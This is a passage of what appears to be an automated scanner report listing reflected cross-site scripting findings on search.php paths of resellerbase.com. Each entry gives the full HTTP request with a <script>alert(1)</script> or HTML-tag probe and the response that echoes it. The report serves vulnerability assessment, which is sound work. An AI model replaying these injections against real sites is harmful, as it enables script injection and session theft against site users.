<p>The requested URL /detail/12/themes/kosmosfec7f<script>alert(1)</script>4a685c9e8db/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1053. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4d51f<script>alert(1)</script>dfb1de7eea7 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images4d51f<script>alert(1)</script>dfb1de7eea7/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images4d51f<script>alert(1)</script>dfb1de7eea7/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1054. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 75ed9<script>alert(1)</script>4ec5b02281 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating75ed9<script>alert(1)</script>4ec5b02281/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating75ed9<script>alert(1)</script>4ec5b02281/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1055. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 74a86<script>alert(1)</script>40dbb256dec was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/search.php74a86<script>alert(1)</script>40dbb256dec?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php74a86<script>alert(1)</script>40dbb256dec?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1056. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload aa91a<a>8dd899a2f09 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchaa91a<a>8dd899a2f09&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchaa91a<a>8dd899a2f09&opt=2 was not found on this server.</p>
...[SNIP]...

2.1057. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 65f33<a>f33c8db0d0e was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...65f33<a>f33c8db0d0e&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...65f33<a>f33c8db0d0e&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1058. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ca56<script>alert(1)</script>3182a9acdab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&5ca56<script>alert(1)</script>3182a9acdab=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&5ca56<script>alert(1)</script>3182a9acdab=1 was not found on this server.</p>
...[SNIP]...

2.1059. http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 83f4d<a>f157490a728 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=283f4d<a>f157490a728 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=283f4d<a>f157490a728 was not found on this server.</p>
...[SNIP]...

2.1060. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3315b<script>alert(1)</script>da89fd1151e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail3315b<script>alert(1)</script>da89fd1151e/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail3315b<script>alert(1)</script>da89fd1151e/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1061. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2cb57<script>alert(1)</script>99084b0a679 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/122cb57<script>alert(1)</script>99084b0a679/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/122cb57<script>alert(1)</script>99084b0a679/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1062. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3087f<script>alert(1)</script>6239f9679d8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes3087f<script>alert(1)</script>6239f9679d8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes3087f<script>alert(1)</script>6239f9679d8/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1063. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 56cfd<script>alert(1)</script>d45e40a22dc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos56cfd<script>alert(1)</script>d45e40a22dc/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos56cfd<script>alert(1)</script>d45e40a22dc/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1064. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4d80a<script>alert(1)</script>0fc09b01bc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images4d80a<script>alert(1)</script>0fc09b01bc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images4d80a<script>alert(1)</script>0fc09b01bc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1065. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 84e1d<script>alert(1)</script>5317627e5d8 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/search.php84e1d<script>alert(1)</script>5317627e5d8?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:20:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php84e1d<script>alert(1)</script>5317627e5d8?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1066. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 94bb0<a>9619d15a96a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search94bb0<a>9619d15a96a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search94bb0<a>9619d15a96a&opt=2 was not found on this server.</p>
...[SNIP]...

2.1067. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 58dfd<a>40e948bb80a was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...58dfd<a>40e948bb80a&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:17:13 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...58dfd<a>40e948bb80a&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1068. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c1939<script>alert(1)</script>da71f2c2433 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1939<script>alert(1)</script>da71f2c2433=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:19:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&c1939<script>alert(1)</script>da71f2c2433=1 was not found on this server.</p>
...[SNIP]...

2.1069. http://www.resellerbase.com/detail/12/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c6835<a>941bbfc43af was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6835<a>941bbfc43af HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/12/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:18:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/12/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2c6835<a>941bbfc43af was not found on this server.</p>
...[SNIP]...

2.1070. http://www.resellerbase.com/detail/12/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/12/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 17f8d<script>alert(1)</script>1141915b360 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail17f8d<script>alert(1)</script>1141915b360/12/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
